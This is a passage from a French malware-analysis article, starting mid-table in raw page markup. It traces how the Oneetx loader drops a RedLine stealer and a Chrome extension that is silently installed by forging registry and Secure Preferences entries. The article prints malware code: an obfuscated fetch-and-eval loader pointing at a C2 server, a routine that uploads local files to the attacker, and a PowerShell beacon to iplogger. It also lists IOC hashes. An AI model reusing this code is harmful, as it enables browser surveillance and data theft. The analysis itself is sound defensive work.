colspan=\"1\" class=\"td_class_57071677\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_57071677\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">qwert3033\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_50914771\" rowspan=\"1\" colspan=\"1\" class=\"td_class_50914771\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_50914771\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24\/04\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_21417084\" rowspan=\"1\" colspan=\"1\" class=\"td_class_21417084\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_21417084\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24\/04\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_62876505\" rowspan=\"1\" colspan=\"1\" class=\"td_class_62876505\" style=\"padding: 10px; max-width: 150px; min-width: 150px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_62876505\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">24\/04\/2023\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_row_inner row_type=\"row\" type=\"full_width\" text_align=\"left\" css_animation=\"\"][vc_column_inner][vc_column_text]Les trois derniers d\u00e9p\u00f4ts h\u00e9bergeaient certains fichiers identiques comme \"<em>Heaven.exe<\/em>\", \"<em>build_2.exe<\/em>\" ou \"<em>123_1.exe<\/em>\". \u00c0 partir du 24\/04\/2023, les d\u00e9p\u00f4ts Bitbucket.org ont \u00e9t\u00e9 abandonn\u00e9s au profit d'autres sites tels que :<\/p>\n<ul>\n<li><code>hxxp:\/\/keep-ass[.]online<\/code><\/li>\n<li><code>hxxps:\/\/cdn-141.anonfiles[.]com<\/code><\/li>\n<li><code>hxxps:\/\/transfert[.]sh<\/code><\/li>\n<\/ul>\n<h3>Une campagne et deux sc\u00e9narios<\/h3>\n<h4><strong>Heaven.exe<\/strong><\/h4>\n<p>Dans le premier sc\u00e9nario, l\u2019ex\u00e9cutable Oneetx t\u00e9l\u00e9charge et lance Heaven.exe (<code>0e45e21d3dfe4d9ae96040530c11c82495ade46d7409cecf7a1374e47a23dd30<\/code>), un stealer RedLine, aussi retrouv\u00e9 sous le nom de Speldings.exe.<\/p>\n<p>Son objectif est de d\u00e9rober les identifiants stock\u00e9s dans le navigateur, la listes des logiciels install\u00e9s, les identifiants de clients FTP install\u00e9s ou encore les portefeuilles de cryptomonnaies. Pour les portefeuilles de cryptomonnaies, le programme va chercher la pr\u00e9sence d'extensions de navigateur comme TonCrystal, PaliWallet, KardiaChain ou encore Phantom. Suite \u00e0 l'obtention de ces informations, les donn\u00e9es de ces extensions (donn\u00e9es priv\u00e9es) sont exfiltr\u00e9es vers un serveur C2.<\/p>\n<p>En plus de ces capacit\u00e9s de stealer, cette souche de RedLine dispose de fonctionnalit\u00e9s permettant la d\u00e9tection d'antivirus ou de machines virtuelles.<\/p>\n<h4><strong>Virus.exe, Togwcstgxg.exe et Ghostworker.exe<\/strong><\/h4>\n<p>Dans ce second sc\u00e9nario, c\u2019est un autre ex\u00e9cutable qui est t\u00e9l\u00e9charg\u00e9 et lanc\u00e9 par Oneetx, au choix entre :<\/p>\n<ul>\n<li>Togwcstgxg.exe (<code>9f48cc23f86e01e52df1010eca7cfdf4732960cda26e952512e36f44cfdd0e6d<\/code>),<\/li>\n<li>Virus.exe (<code>f296b101028093e2c43930229590375a8a73335d08022c28d9c1cf0f84efb5b8<\/code>),<\/li>\n<li>Ghostworker.exe (<code>5b3ca1f72cda154372f0e764ec90568398870810bf87639dfe3b287540750ed5<\/code>).<\/li>\n<\/ul>\n<p>Ces binaires, identiques dans leur fonctionnement, sont des installateurs NSIS (<em>Nullsoft Scriptable Install System<\/em>) qui contiennent encore un autre ex\u00e9cutable, Yosdofwiqay.exe, qu\u2019ils lancent une fois d\u00e9compress\u00e9.<\/p>\n<p>L'ex\u00e9cutable embarqu\u00e9 est lanc\u00e9 de la fa\u00e7on suivante sur la machine de la victime\u00a0:[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" el_class=\"fond_gris\" z_index=\"\" side_padding=\"10\" padding_top=\"30\" padding_bottom=\"30\"][vc_column][vc_column_text]<code>C:\\Users\\admin\\AppData\\Local\\Temp\\nsm9473.tmp\\ns9483.tmp\" \"cmd\" \/c start \"\" \"Togwcstgxg.exe\" &amp; start \"\" \"Yosdofwiqay.exe\" &amp; powershell -command \"Invoke-WebRequest -Uri https:\/\/iplogger.com\/1wjx55\" <\/code>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]\u00c0 noter en fin de commande la pr\u00e9sence d'une requ\u00eate vers le site iplogger.com. Un site dont l'attaquant va se servir pour faire des statistiques sur le nombre d'ex\u00e9cutions du binaire, les adresses IP des victimes, ainsi que leur g\u00e9olocalisation. Plusieurs adresses de ce type avec des identifiants diff\u00e9rents (fin de l'URL) ont \u00e9t\u00e9 trouv\u00e9es durant nos analyses. Le service a depuis blacklist\u00e9 cette URL.<\/p>\n<h3>Yosdofwiqay.exe<\/h3>\n<p>Ce nouveau binaire, Yosdofwiqay.exe (<code>6e3f0d9720e660b39419767a2856ce765a5c18b5d4f37af1889132e3b33b3008<\/code>), t\u00e9l\u00e9charg\u00e9 par Togwcstgxg.exe a \u00e9t\u00e9 compil\u00e9, d'apr\u00e8s ses ent\u00eates, le lundi 20 mars 2023 \u00e0 07:12:29. C\u2019est cet ex\u00e9cutable qui permet d'installer l\u2019extension Google Chrome malveillante.<\/p>\n<p>Une premi\u00e8re analyse du binaire Yosdofwiqay.exe permet de constater la pr\u00e9sence de fichiers js et png embarqu\u00e9s au sein du binaire. L\u2019examen du contenu de ces fichiers confirme qu\u2019il s'agit d'une extension pour navigateur.<\/p>\n<p>L\u2019installation de l\u2019extension se d\u00e9roule sans interaction avec l\u2019utilisateur. Le programme cr\u00e9e une cl\u00e9 de registre \"<code>HKEY_CURRENT_USER\\Software\\Google\\Chrome\\PreferenceMACs\\Default\\extensions.settings\\jnhmegjcjneklkbcajooihfbfioojjjk<\/code>\" (identifiant de l'extension) avec pour valeur un HMAC calcul\u00e9 en fonction de donn\u00e9es pr\u00e9sentes sur la machine : le SID du poste et une seed (graine) qui se trouvent dans le fichier resources.pak de Chrome. L\u2019objectif de ce hashmac est de rendre plus difficile l\u2019installation d\u2019extensions \u00e0 l\u2019insu de l\u2019utilisateur mais sa m\u00e9canique a \u00e9t\u00e9 <a href=\"https:\/\/sudonull.com\/post\/1057-Chrome-reverse-and-installation-of-extensions\" target=\"_blank\" rel=\"noopener\">publiquement analys\u00e9e<\/a> et les acteurs malveillants ont pu le d\u00e9jouer. Le programme \u00e9crit ensuite les fichiers de l'extension (js, png et manifest.json) dans le dossier <code>%APPDATA%\\__xx24098-22590\\<\/code>. Pour finir, celui-ci modifie le fichier de configuration de Chrome \"Secure Preferences\" (\"<code>%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Secure Preferences<\/code>\") pour y enregistrer l'extension aupr\u00e8s du navigateur.<\/p>\n<p>Apr\u00e8s le lancement de l'ex\u00e9cutable, une nouvelle extension ayant pour identifiant \"<code>jnhmegjcjneklkbcajooihfbfioojjjk<\/code>\" est apparue dans la liste d'extensions du navigateur. Cet identifiant est statique.<\/p>\n<p>&nbsp;<\/p>\n<h2>Focus sur l\u2019extension malveillante Chrome<\/h2>\n<h3>Une surveillance de l\u2019activit\u00e9 du navigateur<\/h3>\n<p>En apparence banale et nomm\u00e9e de fa\u00e7on \u00e0 ne pas \u00e9veiller les soup\u00e7ons, un utilisateur exp\u00e9riment\u00e9 remarquera n\u00e9anmoins les nombreuses permissions accord\u00e9es \u00e0 cette extension pour surveiller en d\u00e9tails l'activit\u00e9 du navigateur :<\/p>\n<ul>\n<li>Acc\u00e9der au syst\u00e8me du d\u00e9bogueur de pages<\/li>\n<li>Lire et modifier toutes vos donn\u00e9es sur tous les sites web<\/li>\n<li>D\u00e9tecter votre position g\u00e9ographique<\/li>\n<li>Consulter et modifier votre historique de navigation sur tous les appareils sur lesquels vous \u00eates connect\u00e9 \u00e0 votre compte<\/li>\n<li>Afficher les notifications<\/li>\n<li>Acc\u00e9der \u00e0 vos favoris et les modifier<\/li>\n<li>Lire et modifier les donn\u00e9es que vous copiez\/collez<\/li>\n<li>Effectuer une capture d'\u00e9cran<\/li>\n<li>G\u00e9rer vos t\u00e9l\u00e9chargements<\/li>\n<li>Identifier et exclure des p\u00e9riph\u00e9riques de stockage<\/li>\n<li>Modifier les param\u00e8tres qui contr\u00f4lent l'acc\u00e8s \u00e0 des sites web, \u00e0 des fonctionnalit\u00e9s telles que les cookies, le code javascript, les plugins, la g\u00e9olocalisation, le micro, la cam\u00e9ra, etc.<\/li>\n<li>G\u00e9rer vos applications, vos extensions et vos th\u00e8mes<\/li>\n<li>Communiquer avec les applications natives associ\u00e9es<\/li>\n<li>Modifier vos param\u00e8tres de confidentialit\u00e9<\/li>\n<li>Acc\u00e9der \u00e0 l'ensemble du texte \u00e9nonc\u00e9 \u00e0 l'aide de la synth\u00e8se vocale<\/li>\n<\/ul>\n<p>Ces permissions s'appliquent \u00e0 tous les sites web consult\u00e9s. De plus, la permission \"<code>&lt;all_urls&gt;<\/code>\", pr\u00e9sente dans le fichier manifest.json de l'extension, permet d'acc\u00e9der aux URL du type <code>file:\/\/<\/code>, donc les fichiers locaux.<\/p>\n<p>Lors de notre analyse, cette extension \u00e9tait install\u00e9e dans un dossier nomm\u00e9 %APPDATA%\\__xx3576_19182. Mais il s\u2019av\u00e8re que le dossier et chaque fichier \u00e0 l\u2019int\u00e9rieur (en dehors du manifest.json) sont nomm\u00e9s al\u00e9atoirement.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_single_image image=\"398511\" img_size=\"large\" alignment=\"center\" qode_css_animation=\"\"][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><em><small>Figure 3 : capture \u00e9cran des composants de l\u2019extension<\/small><\/em><\/p>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Les scripts quant \u00e0 eux contiennent, en plus du code malveillant, des donn\u00e9es inutiles et randomis\u00e9es ; ces fichiers \u00e9tant g\u00e9n\u00e9r\u00e9s de fa\u00e7on \u00e0 \u00eatre uniques.<\/p>\n<h3>Charge utile et objectif<\/h3>\n<p>Une fois le surplus retir\u00e9, le code utile est succinct. Brouill\u00e9 sommairement, sa logique est simple et vise \u00e0 r\u00e9cup\u00e9rer et ex\u00e9cuter du code javascript pr\u00e9sent sur \"<code>hxxp:\/\/23[.]95.97.22\/dropper.php?code_request=backend<\/code>\" (toujours actif au moment de l'\u00e9criture de cet article)\u00a0:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" el_class=\"fond_gris\" z_index=\"\" side_padding=\"10\" padding_top=\"30\" padding_bottom=\"30\"][vc_column][vc_column_text]<code>async function KLqUurCkbvJjLtKtUNSVmmGjd() {<br \/>\nlet VIdYprArNcvzuEVAxBrH = await fetch(String.fromCharCode(104,116,116,112,58,47,47,50,51,46,57,53,46,57,55,46,50,50,47,100,114,111,112,112,101,114,46,112,104,112,63,99,111,100,101,95,114,101,113,117,101,115,116,61,98,97,99,107,101,110,100));<br \/>\nvar pukTUCgCJwnCFZMrHmDB = await VIdYprArNcvzuEVAxBrH.text();<br \/>\nlet hKUhJBItRGWLqHzecUBC = JSON.parse(pukTUCgCJwnCFZMrHmDB)<br \/>\neval( hKUhJBItRGWLqHzecUBC.code )<br \/>\n}<br \/>\n<\/code>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]La charge utile t\u00e9l\u00e9charg\u00e9e contient tout d'abord deux biblioth\u00e8ques Javascript connues :<\/p>\n<ul>\n<li>jQuery v3.5.1 : qui permet de disposer d'un framework facilitant le d\u00e9veloppement javascript\u00a0;<\/li>\n<li>CyrptoJS : qui permet de r\u00e9aliser des op\u00e9rations cryptographiques (hachage, chiffrement, d\u00e9chiffrement).<\/li>\n<\/ul>\n<p>Un nouveau fichier est ensuite t\u00e9l\u00e9charg\u00e9 \u00e0 l'adresse <code>hxxp:\/\/23[.]95.97.22\/dropper.php?code_request=frontend<\/code>. Il contient, comme pour le fichier pr\u00e9c\u00e9dent, du code brouill\u00e9 qui sera lanc\u00e9 par l'extension. La suite du code contient des fonctions permettant de s'abonner\u00e0 certains \u00e9v\u00e8nements \u00e9mis par le navigateur. Cela permet de d\u00e9clencher des requ\u00eates vers le serveur de l'attaquant lors, par exemple, d'une ouverture d'onglet, d'un t\u00e9l\u00e9chargement, etc. De quoi suivre en temps r\u00e9el l'activit\u00e9 de la victime.<\/p>\n<p>L'extension utilise le LocalStorage du navigateur afin d'y stocker un identifiant unique permettant au serveur de l'attaquant de diff\u00e9rencier ses victimes.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" el_class=\"fond_gris\" z_index=\"\" side_padding=\"10\" padding_top=\"30\" padding_bottom=\"30\"][vc_column][vc_column_text]<code>chrome.storage.local.get(['botID'], function( data ){<br \/>\nbotID = data.botID === undefined ? makeid( 25 ) : data.botID;<br \/>\nchrome.storage.local.set({ botID }, run_application);<br \/>\n});<br \/>\n<\/code>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Cet identifiant, ayant pour cl\u00e9 \"<code>botID<\/code>\" et pour valeur une cha\u00eene de caract\u00e8res al\u00e9atoire, est envoy\u00e9 lors de chaque communication avec le serveur (<em>voir requ\u00eate \u00ab fetch \u00bb plus bas<\/em>). V\u00e9rifier la pr\u00e9sence de cette cl\u00e9 dans le LocalStorage permet d'identifier si un navigateur est la cible de l'extension malveillante.<\/p>\n<p>D'autres fonctions servent \u00e0 impl\u00e9menter des actions n\u00e9cessaires au vol de donn\u00e9es\u00a0:<\/p>\n<ul>\n<li>v\u00e9rification des disques pr\u00e9sents sur la machine,<\/li>\n<li>r\u00e9alisation de captures d\u2019\u00e9cran,<\/li>\n<li>r\u00e9cup\u00e9ration des cookies,<\/li>\n<li>r\u00e9cup\u00e9ration de l'historique,<\/li>\n<li>enregistrement des frappes clavier dans le contexte du navigateur.<\/li>\n<\/ul>\n<p>Les fichiers sont ensuite exfiltr\u00e9s vers le serveur de l'attaquant vers l'URL <code>[IP]\/gate\/http_handler.php<\/code>\u00a0:[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" el_class=\"fond_gris\" z_index=\"\" side_padding=\"10\" padding_top=\"30\" padding_bottom=\"30\"][vc_column][vc_column_text]<code>function SOCKET_load_filepath( info ){<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0 [...]<\/code><\/p>\n<p><code>\u00a0\u00a0\u00a0 fetch(\"file:\/\/\/\" + info.point).then( response =&gt; response.blob() ).then( response =&gt; {<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 let filename = info.point.split(\"\/\")<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 filename = filename[filename.length-1]<\/code><\/p>\n<p><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 var file = new File([response], filename);<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 var formData = new FormData();<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 formData.append('action', \"update_fm_file_data\");<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 formData.append('data', file );<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 formData.append('botID', botID);<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 formData.append('filename', filename);<\/code><\/p>\n<p><code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 $.ajax({<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 url: \"http:\/\/\"+server_address+\"\/gate\/http_handler.php\",<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 type: 'POST',<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 data: formData,<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 processData: false,<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 contentType: false,<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 success: function(result) {<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Soket.sendMessage({ operation: \"update_filemanager\", data: { filename, response_type }})<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 }<\/code><br \/>\n<code>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 });<\/code><br \/>\n<code>\u00a0\u00a0\u00a0 });<\/code><br \/>\n<code>}<\/code>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]Les messages envoy\u00e9s au travers de la fonction sendMessage sont chiffr\u00e9s via un chiffrement AES 256 CBC, via une cl\u00e9 de chiffrement en dur dans le code\u00a0: \"<code>123<\/code>\".[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" el_class=\"fond_gris\" z_index=\"\" side_padding=\"10\" padding_top=\"30\" padding_bottom=\"30\"][vc_column][vc_column_text]<code>let data = JSON.stringify( { action: \"bot_request\", \"extra\": Object.assign({ botID: botID }, object ) } )<br \/>\ndata = encryption.encrypt(data, \"123\");<br \/>\n[...]<br \/>\nsocket.send( data );<\/code>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text]<\/p>\n<h2>IOCs RedLine<\/h2>\n<h3>Fichiers<\/h3>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\"][vc_column][vc_row_inner row_type=\"row\" type=\"full_width\" text_align=\"left\" css_animation=\"\"][vc_column_inner][vc_empty_space][vc_column_text]<div class=\"ntb_table_wrapper ninja_table_builder_instance_1\"\n     id='ninja_table_builder_418142'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_1\"\n     style=\"\n     max-height:2000px;\n     max-width: 1160px;\">\n    <!----> <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_418142\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><!----> <tbody class=\"tbody\"><tr id=\"tr_id_1786578\" class=\"desktop-view tr_class_1786578 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_79143160\" rowspan=\"1\" colspan=\"1\" class=\"td_class_79143160\" style=\"padding: 10px; max-width: 300px; min-width: 300px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_79143160\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Output.exe\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_28324173\" rowspan=\"1\" colspan=\"1\" class=\"td_class_28324173\" style=\"padding: 10px; max-width: 500px; min-width: 500px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_28324173\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">7beb3f5dd622520c95241c27a48c3728ff3e77178870271f620e9c217850d4d2<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8514643\" class=\"desktop-view tr_class_8514643 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_80275402\" rowspan=\"1\" colspan=\"1\" class=\"td_class_80275402\" style=\"padding: 10px; max-width: 300px; min-width: 300px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_80275402\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">tester.exe\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_53611804\" rowspan=\"1\" colspan=\"1\" class=\"td_class_53611804\" style=\"padding: 10px; max-width: 500px; min-width: 500px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_53611804\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">b701f623cfec2e92c0e40c931c633caaf2d5f0874dd162e4974603ea424c60ee<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_1316926\" class=\"desktop-view tr_class_1316926 \" style=\"background: rgb(221, 221, 221);\"><!----> <td id=\"td_id_76137009\" rowspan=\"1\" colspan=\"1\" class=\"td_class_76137009\" style=\"padding: 10px; max-width: 300px; min-width: 300px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_76137009\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">Togwcstgxg.exe\t<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><td id=\"td_id_10510755\" rowspan=\"1\" colspan=\"1\" class=\"td_class_10510755\" style=\"padding: 10px; max-width: 500px; min-width: 500px; border: 1px solid rgb(0, 0, 0);\"><div id=\"td_id_10510755\"><div class=\"single-item other-item\"><div class=\"ntb-datas-wrapper\" style=\"margin: 0px;\"><span class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 15px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\">9f48cc23f86e01e52df1010eca7cfdf4732960cda26e952512e36f44cfdd0e6d<\/span> <!----> <!----><\/div> <div class=\"ntb-elements-wrapper remove-elements\"><!----><\/div> <div class=\"icon-style remove-elements\" style=\"margin-left: 0px; margin-right: 0px; width: auto;\"><i class=\"el-icon-rank\"><\/i> <i class=\"el-icon-copy-document\"><\/i> <i class=\"el-icon-delete\"><\/i><\/div><\/div><\/div><\/td><\/tr><tr id=\"tr_id_8545428\" class=\"desktop-view tr_class_8545428 \" style=\"background: rgb(255, 255, 255);\"><!----> <td id=\"td_id_31724699\" rowspan=\"1\" colspan=\"1\" 